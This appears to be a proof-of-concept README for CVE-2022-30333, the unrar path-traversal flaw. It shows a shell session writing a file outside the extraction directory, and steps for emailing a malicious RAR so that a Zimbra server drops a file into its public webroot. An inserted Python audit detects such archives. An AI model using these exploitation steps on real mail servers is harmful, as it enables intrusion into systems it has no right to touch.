# CVE-2022-30333-POC
**Sample files to test CVE-2022-30333**
- [Sample.rar](./sample.rar): for testing on Linux. Extracting it creates **trav** in **../../tmp/traversed**. Make sure the directory **../../tmp/traversed** exists before extracting Sample.rar.
- [exp.rar](./exp.rar): for testing on a Zimbra mail server. Extracting it creates **moo.txt** in */opt/zimbra/jetty\_base/webapps/zimbra/public/*. The file is then reachable at https://zimbra_mail_domain/public/moo.txt
## EXPLOITATION STEPS
### Testing on Linux
```
$ mkdir ../../tmp/traversed   # the destination folder must exist before running unrar
$ ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
$ unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
$ ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:34 trav
$ cat ../../tmp/traversed/trav
"traversed"
```
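The session above shows the pattern to look for: the archive stores a link entry `sym` first, then a file `sym/trav` that ends up outside the extraction directory. A pre-extraction policy check for that pattern, as an added example that is not part of the original README; `audit`, `SAMPLE` and the `(name, link_target)` tuple format are assumptions, and the entry list is constructed to mirror the session, not parsed from unrar output.

```python
import posixpath

def _norm(path):
    # Treat "\" and "/" alike *before* validating, so the check sees the
    # same path the extractor finally uses on a Unix filesystem.
    return posixpath.normpath(path.replace("\\", "/"))

def _escapes(path):
    # True if a normalised path is absolute or climbs above its base.
    return path.startswith("/") or path == ".." or path.startswith("../")

def audit(entries):
    """entries: (name, link_target or None) tuples in archive order.
    Returns (name, reason) for every entry that should not be extracted."""
    findings, links = [], set()
    for name, target in entries:
        n = _norm(name)
        if _escapes(n):
            findings.append((name, "entry name leaves destination"))
            continue
        parts = n.split("/")
        parents = {"/".join(parts[:i]) for i in range(1, len(parts))}
        if parents & links:
            # Conservative: refuse any write routed through an archived link.
            findings.append((name, "path passes through archived symlink"))
        if target is not None:
            resolved = _norm(posixpath.join(posixpath.dirname(n), target))
            if _escapes(resolved):
                findings.append((name, "symlink target leaves destination"))
            links.add(n)
    return findings

# Constructed sample modelled on the session above (not real unrar output).
SAMPLE = [
    ("sym", "../../tmp/traversed"),   # link entry pointing out of the tree
    ("sym/trav", None),               # file written through that link
    ("docs/readme.txt", None),        # ordinary file
    ("docs/latest", "readme.txt"),    # link that stays inside the tree
]

if __name__ == "__main__":
    for name, reason in audit(SAMPLE):
        print(f"REJECT {name}: {reason}")
```

Run a check of this kind before handing an untrusted archive to the extractor, and reject the whole archive if it returns any finding.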
### Testing on Zimbra
- Create an email, attach the malicious RAR file, and send it to a Zimbra email address. The RAR file is extracted when Amavisd analyzes the message.
- The moo.txt file should then be at */opt/zimbra/jetty\_base/webapps/zimbra/public/moo.txt*, reachable as *https://zimbra_mail_domain/public/moo.txt*
## REFERENCES
1. [Vietnamese blog from DEV2SEC](https://dev2sec.tech/security/zimbra-pre-auth-rce/)
2. [English blog from Sonarsource](https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/)
3. Special thanks to **mrlihd** for helping me rebuild the attack chain in Zimbra
File snapshot
[4.0K] /data/pocs/a466bbf77e0994a73365f10d75c757401eab6bb2
├── [ 172] exp.rar
├── [2.0K] README.md
└── [ 145] sample.rar
0 directories, 3 files